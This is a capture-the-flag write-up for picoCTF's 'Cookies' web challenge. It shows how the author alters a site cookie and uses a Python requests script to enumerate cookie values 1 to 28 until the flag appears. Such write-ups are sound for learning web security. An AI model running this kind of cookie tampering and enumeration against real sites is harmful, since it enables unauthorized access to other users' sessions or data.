Cookies

Problem Description

Who doesn’t love cookies? Try to figure out the best one.  http://mercury.picoctf.net:27177/

• Target: http://mercury.picoctf.net:27177/
• Goal: extract a flag
• Initial Observations: From the challenge name it seems that we will be dealing with cookies.

Tools Used

• Cookie-Editor Extension
• Python script
• Burp Suite

Solution Steps

1. Inspecting the page
   if search with the placeholder snickerdoodle we get this response

   

   let’s see the cookie editor extension

   

   let’s try to change the cookie value to a random number like 5 and see what happens

   

   so by changing the cookie value we get different cookie names

2. How to get the cookie value of the flag
   let’s see the request passed

   

   

   So this is the request and response so I can make a python script to brute force the cookie value until the header of the picoCTF flag picoCTF{

3. The python script
   First of all let’s see the maximum cookie value. After few tries I found that the maximum value is 28 so let’s start typing the script.

   PYTHON

   Collapse Copy

   Click to expand

import requests import re

url = “ http://mercury.picoctf.net:27177/check"

headers = { “User-Agent”: “Mozilla/5.0 (Windows NT 10.0; Win64; x64)”, “Accept”: “text/html,application/xhtml+xml,application/xml;q=0.9”, “Referer”: “ http://mercury.picoctf.net:27177/" , }

for i in range(1, 29):
cookies = {“name”: str(i)}

response = requests.get(url, headers=headers, cookies=cookies)
match = re.search(r"picoCTF\{.*?\}", response.text)

if "picoCTF{" in response.text:
    print(f"🎉 Flag found! Cookie value: {i}")
    print(match.group(0))
    break
else:
    print(f"Tried cookie value: {i} - No flag found.")

First from the request we captured by burp let's put it then try to extract the flag by regex expression.




---